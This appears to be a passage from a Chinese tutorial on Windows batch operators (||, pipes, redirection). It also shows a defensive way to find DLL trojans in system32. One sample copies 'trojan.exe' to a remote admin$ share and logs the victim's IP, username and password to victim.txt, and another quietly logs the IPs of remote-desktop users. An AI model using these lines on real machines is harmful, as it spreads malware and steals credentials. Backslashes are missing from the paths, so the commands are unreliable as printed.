批处理的高级运用技巧

2019-09-19 07:07:23于海丽

Usage:第一条命令 || 第二条命令 [|| 第三条命令...] 
用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令; 
Sample: 
C:Ex4rch>dir sometips.gif || del sometips.gif 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 
Directory of C:Ex4rch 
2002-05-14 23:55 14 sometips.gif 
1 File(s) 14 bytes 
0 Dir(s) 768,696,320 bytes free 
组合命令使用的例子: 
sample: 
@copy trojan.exe %1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt 
No.4 
四、管道命令的使用 
1.| 命令 
Usage:第一条命令 | 第二条命令 [| 第三条命令...] 
将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。 
sample: 
time /t>>D:IP.log 
netstat -n -p tcp|find ":3389">>D:IP.log 
start Explorer 
看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面这个bat,以获得登录用户的IP。 
2.>、>>输出重定向命令 
将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。 
sample1: 
echo hello world>c:hello.txt (stupid example?) 
sample2: 
时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录: 
运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt, 
这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中, 
日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了. 
这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行: 
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如果有的话也不要直接DEL掉,先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。 
相关文章 大家在看